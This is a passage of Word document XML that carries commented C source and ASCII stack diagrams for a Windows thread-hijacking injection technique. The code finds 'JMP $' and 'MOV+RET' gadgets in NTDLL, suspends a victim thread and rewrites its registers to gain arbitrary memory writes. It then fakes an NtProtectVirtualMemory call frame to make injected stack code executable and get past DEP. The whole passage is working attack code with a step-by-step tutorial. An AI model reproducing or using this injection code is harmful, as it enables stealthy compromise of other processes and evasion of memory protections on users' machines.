    <w:p w14:paraId="65004C6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57803AA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D57D33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if((NTDLLCode[j]==0xC3)||((NTDLLCode[j]==0xC2)&amp;&amp;(NTDLLCode[j+2]==0x00)))    // we look for a RET or RET n ( with n not above 255 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4ED30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                                                                            // if thats the case, we have found the second pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34036D1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( MOV + RET ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027DF81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35A4065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if(MOVRETOffsetFromMemoryRegister==0)    // if the MOV was a "MOV [REG1],REG2", then i variable was incremented by 2 ( the size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70940BF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MOVRETAddress=(DWORD)&amp;NTDLLCode[i-2];    // of its machine code bytes ), so we set MOVRETAddress to NTDLLCode+i-2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9C548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else                                    // else, it was a "MOV [REG1+xx],REG2", so i variable was incremented by 3 ( the size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A63AFA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MOVRETAddress=(DWORD)&amp;NTDLLCode[i-3];    // of its machine code bytes ), so we set MOVRETAddress to NTDLLCode+i-3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D56C08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44250EF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NumberOfBytesToPopAfterMOVBeforeRET=k;    // we set this variable to the amount accumulated into k ( value that will be added to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBB6F8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ESP after the MOV gets executed and just before executing the RET ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB31D9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B82C12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i=j+3;    // we increment i so that it points ahead this pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6239082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break;    // and we finish the subsearch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FB8EB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0D9F2A0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2E1BE15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break;    // if we reach a instruction that is not a POP REGx or ADD REGx,yy, we finish this subsearch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA103D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021E7B7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6673955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7B360AC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3480D5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i++;    // increment i and keep looking for any "JMP $" or "MOV + RET"...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E33CFE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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BB342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CCC52E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if((JMPTOSELFAddress)&amp;&amp;(MOVRETAddress))    // If we found those required patterns... fun stuff starts ! ;D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6594104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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C41306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SuspendThread(Thread);    // we suspend our victim thread, this is where the hijacking starts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEB03F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3203C9B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SavedThreadContext.ContextFlags=CONTEXT_FULL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565E20C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WorkingThreadContext.ContextFlags=CONTEXT_FULL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741BA3E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36C485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 xml:space="preserve">GetThreadContext(Thread,&amp;SavedThreadContext);    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>// we get and save initial thread's state for later restoring it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C20D11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GetThreadContext(Thread,&amp;WorkingThreadContext);    // we get the same state again, but this time for messing with it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2202D0E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115DEF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here we calculate the amount of thread's stack space we are going to need ( in order to write our injection bytes there )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F16FBB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the calculation is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC3D42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26AFB8B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INITIAL STACK STATUS                           NEW STACK STATUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4EDDD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____________________                         ____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A136E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Stack Bottom      |                    |&lt;--- Stack Bottom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC425C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                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EAA98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                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7740A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                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F8ADA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|____________________|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B794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                  |&lt;--- ESP ( and also BASEOfWrittenBytes )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D756F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RESERVED STACK    | ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072FAC2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SPACE FOR OUR     | |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEC220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INJECTION         | |   NumberOfBytesToPopAfterMOVBeforeRET==variable        (1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE1E91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                  | |                        +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B7F7E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  RESERVED STACK  | |                 sizeof(DWORD)==4                       (2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AF913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   SPACE FOR OUR  | |                        +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E62114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       INJECTION  | |  sizeof(NtProtectVirtualMemoryCallFrame)==4+20+12      (3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333E33D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                  | |                        +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74570DB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RESERVED STACK    | |   NumberOfDWORDsToInject*sizeof(DWORD)==variable       (4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB67DD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 |                    |                       |  SPACE FOR OUR     | |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5607C40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|  INJECTION         | |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F82F9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                       |____________________| v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06466EA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ESP               |                    |&lt;--- Initial ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5710ACE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                       |  USED STACK SPACE  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C50FE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                       |  USED STACK SPACE  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FFA66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                       |  USED STACK SPACE  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A05C1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                       |  USED STACK SPACE  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF9DCE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                       |  USED STACK SPACE  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9CA87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                       |  USED STACK SPACE  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F7C48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                       |  USED STACK SPACE  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473C67E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                       |  USED STACK SPACE  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736C085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|____________________|&lt;--- Stack Top         |____________________|&lt;--- Stack Top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1288437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109070D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1044B3D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36B3A4C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[1] 0..N &gt; Number of bytes reserved to hold arbitrary ( we just need the space to be there ) bytes, so that the "POP REGx" and/or "ADD REGx,yy"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C6560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       instructions we have found after the "MOV [REG1],REG2", increment ESP to fit into the next item.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DFAA5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0A972E0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[2] 4    &gt; This is the important one. DWORD sized space that will hold a return address. The RET instruction, which comes after the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CE0C5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       "MOV [REG1],REG2" and other possible "POP REGx" and/or "ADD REGx,yy" instructions, will pop this return address and divert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBBAC0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       execution of the thread to that address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC4A87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2C7FE87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[3] 36   &gt; This will hold 9 DWORDs of a simulated stack frame for a call to NtProtectVirtualMemory API. 1 DWORD for a return address + 5 DWORDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420549F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       for the 5 parameters that API function takes + 3 DWORDs for storing 3 local DWORDs that will be pointed to by 3 out of those 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF429F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       parameters. Those 3 pointed parameters are output variables the API needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FA549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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028B6A9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[4]      &gt; DWORD boundary aligned size of the machine code we are going to inject and later execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3983E40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13CF2EC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BASEOfWrittenBytes=WorkingThreadContext.Esp-((NumberOfDWORDsToInject*sizeof(DWORD))+((1+5+3)*sizeof(DWORD))+sizeof(DWORD)+NumberOfBytesToPopAfterMOVBeforeRET);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E42FB3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3AAC1BD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77B3C23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STACK STATUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462DC48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____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D8D96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Stack Bottom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E18983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4094230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,*WritePointer ( REG1 ) == BASEOfWrittenBytes - MOVRETOffsetFromMemoryRegister + NumberOfBytesToPopAfterMOVBeforeRET (1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E100A6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,-| +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186AC80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| `MOVRETOffsetFromMemoryRegister ( 0 if using "MOV [REG1],REG2", xx if using "MOV [REG1+xx],REG2" )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5387EB5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    `-------------------------------------.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205C30B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,ESP == BASEOfWrittenBytes (2)       |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC49FB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a            |   ,-| +                                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1130DA4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b            |   | `NumberOfBytesToPopAfterMOVBeforeRET |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3357C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.                  |   |                                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBB095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.                  |   |                                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28613FB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z            |   |                                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D640C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   |                                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777FB7F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return address (3) |/&lt;-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                                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C2000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|____________________|\&lt;----------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228829A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5CB35B3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67BF1B8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 SOMEWHERE INTO NTDLL.DLL's CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298F0B7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 ________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB89C4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(3) EIP == MOVRETAddress ---&gt;|                                        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184FBF1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|  MOV [REG1],REG2 / MOV [REG1+xx],REG2  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4662758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|  ( POP REGx / ADD REGx,yy )            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A42866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|  .                                     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752B855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|  .                                     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A67B7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|  RET / RET n                           |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADAAA6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|________________________________________|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C7A05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625ECD3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69F2DBB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          SOMEWHERE INTO NTDLL.DLL's CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E4098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          _______________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4F025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(4) *WriteItem ( REG2 ) == JMPTOSELFAddress ---&gt;|                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0118E20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         |  JMP $                        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A4D38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         |_______________________________|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7853D4D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4318DF3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2C37E50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7759D8D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4CDFA84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Initial ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B46E03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2913871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6D31C47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294BA80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567B073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48D0928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0493600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24D7AB7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00DA7DB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|____________________|&lt;--- Stack Top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59152B1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1C2232B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6700B8B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21BA8E8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[1] WritePointer points to some register field into WorkingThreadContext ( REG1 in that "MOV [REG1],REG2", see DisassembleAndValidateMOV )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFAD9A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and we set that chosen register's  value so that REG1+MOVRETOffsetFromMemoryRegister points to the same place where thread's ESP ( see</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7C211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[2], will have the same value as BASEOfWrittenBytes )+NumberOfBytesToPopAfterMOVBeforeRET points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0DAE1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*WritePointer=BASEOfWrittenBytes-MOVRETOffsetFromMemoryRegister+NumberOfBytesToPopAfterMOVBeforeRET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DCA08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3907B57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[2] we set the new ESP, just the initial ESP minus the number of bytes needed for our injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C935D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WorkingThreadContext.Esp=BASEOfWrittenBytes;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D23B8B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E71700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[3] we divert thread's execution to one of the patterns we have found found: "MOV [REG1],REG2"+...+"RET".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E3EE5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WorkingThreadContext.Eip=MOVRETAddress;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033BA77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2293957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[4] WriteItem points to some register field into WorkingThreadContext ( REG2 in that "MOV [REG1],REG2", see DisassembleAndValidateMOV ) and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D9899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we set its value so that it points to the other pattern we found: "JMP $".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7F44E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*WriteItem=JMPTOSELFAddress;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3383723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4C0899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Now the trick itself: we let thread's execution continue ( see WaitForThreadAutoLock ) and wait till its EIP register gets a value of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796AF36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JMPTOSELFAddress, this is what happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170924F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54DCE4F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a) The thread executes that "MOV [REG1],REG2" or "MOV [REG1+xx],REG2": since REG1 or REG1+xx point to a DWORD in stack which is going to be</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39479BA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popped out as a return address, after this instruction gets executed, REG2's value will be stored in stack as a return address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B7F6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b) After that "MOV [REG1],REG2" or "MOV [REG1+xx],REG2", some "POP REGx" and/or "ADD REGx,yy" may come. Those are useless for our trick, we</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC2960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have just taken them into account for stack balancing calculations ( see NumberOfBytesToPopAfterMOVBeforeRET calculations in that while{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A02C36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loop before ). So those "POP REGx" and/or "ADD REGx,yy" could make ESP advancements, but they are ok since we determined which value ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470EB14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will take before executing the next RET instruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B4352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c) After that set of "POP REGx" and/or "ADD REGx,yy" instructions, we reach a "RET" or "RET n" instruction, so ESP points to a return address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316902A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and ( see "a)" ) that return address has REG2's value, which, if you look at [4] step before, points to a "JMP $" instruction. So after</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2496709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this "RET" or "RET n" executes, thread's execution will be diverted to a "JMP $", which, you can see that, makes the thread enter an</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6A411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auto-lock state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195039A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 xml:space="preserve">// d) This WaitForThreadAutoLock routine will eventually see how the hijacked thread's </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>execution reached that auto-lock state ( I mean, EIP gets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C129F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a value equal to JMPTOSLEFAddress ) and let us continue with our thread manipulation tasks... };&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E72CDB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WaitForThreadAutoLock(Thread,&amp;WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254A535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2F6C58D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Ooookkaayyy, pretty complex thread manipulation but... what have we achieved so far ? Nothing... nothing ? Not yet, but keep going. This is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9841C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what we have achieved:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E21940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193833E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1C2CAFB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STACK STATUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795EB8A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____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DFCEF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Stack Bottom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4212C46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6505568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18D5018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3EA7C63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456C450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65A22DC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BASEOfWrittenBytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C4447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a            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1983D3D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b            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7162989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.                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E84257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.                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9DBC1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z            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644690C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022E1AB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JMPTOSELFAddress -------------------.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC4675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                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BDC55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ESP        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354926D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5264372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69A5020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7A4C849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6488575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5D8BC2C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55BC372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309C3AA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74837CB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7355A84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3826174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28586E3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63880E6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                                    SOMEWHERE INTO NTDLL.DLL's CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759CDBD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                                    _______________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAA5B7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      EIP == JMPTOSELFAddress ---&gt;\|                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B848D7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 |                    |                `---------------------------------&gt;/|  JMP $                        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1734243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         |_______________________________|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465F045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4637333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4EB466C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79D790B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5DD6E38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Initial ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E40E1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22FE0E0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076C214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5A46076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4B97978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119CA8A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41FDDDC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4331614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586E8A2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|____________________|&lt;--- Stack Top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B8044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6589753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6562426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So... it may seem we have nothing here, but we do have something. That return address is now an address that points to "JMP $", this means</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B371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that, from now on, we can repeat the process as many times as we need/want and we no longer need REG1 to point to that return address and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9CA7D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we no longer need that REG2 to point to "JMP $" instruction. We must simply readjust thread's ESP to point to the same initial point we gave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADF0DE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it the previous time ( BASEOfWrittenBytes ) and readjust EIP so that it points to the same initial address of the previous time ( that is,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A258FB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MOVRETAddress ). We can set REG1 to be "anywhere" and set REG2 to be "anything", so, from now on, we can write any DWORD to any place. Get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E06504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the idea ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134322A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195B04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What comes next is a loop for writing 9 DWORDs that represent a simulated call frame to NtProtectVirtualMemory API. We will simulate a call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3699139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to this API in order to mark our injection memory ( a range of bytes into the region we reserved for the injection in the stack ) as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2991B31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PAGE_EXECUTE_READWRITE, so that DEP ( Data Execution Prevention ) does not stop us from executing the injected code later on. Let's see</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F6EE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NtProtectVirtualMemory's C language prototype:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9DE0E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15C9704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NtProtectVirtualMemory(    IN HANDLE ProcessHandle,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE551B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                            IN OUT PVOID *BaseAddress,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577DF33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                       IN OUT PULONG NumberOfBytesToProtect,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E75A5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                       IN ULONG NewAccessProtection,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6782B17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                       OUT PULONG OldAccessProtection );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE03DD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04B024E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Okay, so, it takes 5 parameters, why 9 DWORDs then ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7483E78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03557EA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SIMULATED RETADDR  |                (1) 1st DWORD: This will hold the address to where the API would return after doing its job,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E7D1D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p.1: ProcessHandle |                2nd DWORD: This will hold 0xFFFFFFFF ( -1, current process, see NtProtectVirtualMemoryCallFrame ),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356AC9E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p.2: &amp;BaseAddress -----------.      (2) 3rd DWORD: We will make this have a pointer to the 7th DWORD,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD15D3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p.3: &amp;NumBytesProt --------. |      (3) 4th DWORD: We will make this have a pointer to the 8th DWORD,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F303B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p.4: NewAccessProt |       | |      5th DWORD: This will hold PAGE_EXECUTE_READWRITE ( see NtProtectVirtualMemoryCallFrame ),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E173E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p.5: &amp;OldAccessPrt ----.   | |      (4) 6th DWORD: We will make this have a pointer to the 9th DWORD,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B28D75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BaseAddress        |&lt;--+---+-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(5) 7th DWORD: We will make this to be a pointer to our injection's executable code ( put in the stack )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D8E2D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NumBytesProt       |&lt;--+---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  (6) 8th DWORD: We will make this to be the size of our injection's executable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3383369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OldAccessPrt       |&lt;--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      9th DWORD: We do not care about this, we just need to reserve the space...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD1E24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4DE3543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25230E0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[1] We need to be able to synchronize the moment when NtProtectVirtualMemory finishes and make the thread stop there, so we set this DWORD to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDD53D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JMPTOSELFAddress ( address of "JMP $" instruction ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E7502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NtProtectVirtualMemoryCallFrame[0]=JMPTOSELFAddress;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F9CBB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709217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[2] We make the 3rd DWORD point to the 7th DWORD, as we are going to write this 9 DWORD array to the stack, just after the return address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6456BBD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     we have been using in the previous step, we make the pointer calculations like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E70E22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7BA0AAB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BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC2F3E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BASE + skip dummy DWORDs that will be popped + skip return address+... ( those "..." are the BASE for this 9 DWORD array ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B136CF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5346F75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So in this case, to point to 7th DWORD, we need to skip those and then skip 1 more DWORD for the return address of this call frame plus 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648CDC9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DWORDs for the 5 parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF767F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NtProtectVirtualMemoryCallFrame[2]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+((1+5+0)*sizeof(DWORD));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505C6A2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0460A0C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[3] We make the 4th DWORD point to the 8th DWORD, we do it as we did it for [2], but we skip a DWORD more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A04A08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NtProtectVirtualMemoryCallFrame[3]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+((1+5+1)*sizeof(DWORD));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8F114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0197313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[4] We make the 6th DWORD point to the 9th DWORD, we do it as we did it for [2], but we skip two more DWORDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2047725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NtProtectVirtualMemoryCallFrame[5]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+((1+5+2)*sizeof(DWORD));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9E39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09C425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[5] This is not as the previous 3, this is not a parameter, it is a local variable, pointed by parameter 2 ( 3rd DWORD ). We make it point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A949F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to a point in the stack where we will be injecting executable code. That point will be just after this 9 DWORD call frame, thats why</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A882E9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we skip one more DWORD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45708C8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NtProtectVirtualMemoryCallFrame[6]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+((1+5+3)*sizeof(DWORD));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CD0FC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AE3509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[6] We make 8th DWORD be the size that our injected executable code has</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9757A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NtProtectVirtualMemoryCallFrame[7]=NumberOfDWORDsToInject*sizeof(DWORD);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520B186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0EB42D1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 Here we write those 9 DWORDs into thread's stack space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3132A6F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7F3D3DB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STACK STATUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B76188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____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C970A8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Stack Bottom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397B5B5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4C6B2BC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467C87E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3277863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2E657E4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06AADC9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,ESP == BASEOfWrittenBytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DC479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a            |   ,-| +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B27BE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b            |   | `NumberOfBytesToPopAfterMOVBeforeRET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E488B9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.                  |   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6020C41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.                  |   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640EF60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z            |   |                                                                              ( for i from 0 to 8 )---.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D013E5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   |                                                                                                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C05FC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JMPTORETAddress    |&lt;--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                                   *WriteItem ( REG2 ) == NtProtectVirtualMemoryCallFrame[i]  &lt;-|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262616A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 | __________|    ,MOVRETOffsetFromMemoryRegister                                                                       |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E40C11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|&lt;---| -                                                                                                   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353C6BD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 .  `*WritePointer ( REG1 ) == BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+i*4 &lt;-</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB01D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A01104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 .                                          SOMEWHERE INTO NTDLL.DLL's CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DB894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 .                                          ________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122F50A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                  EIP == MOVRETAddress ---&gt;|                                        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C36C06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                                           |  MOV [REG1],REG2 / MOV [REG1+xx],REG2  |</w:t>
      </w:r>
    </w:p>
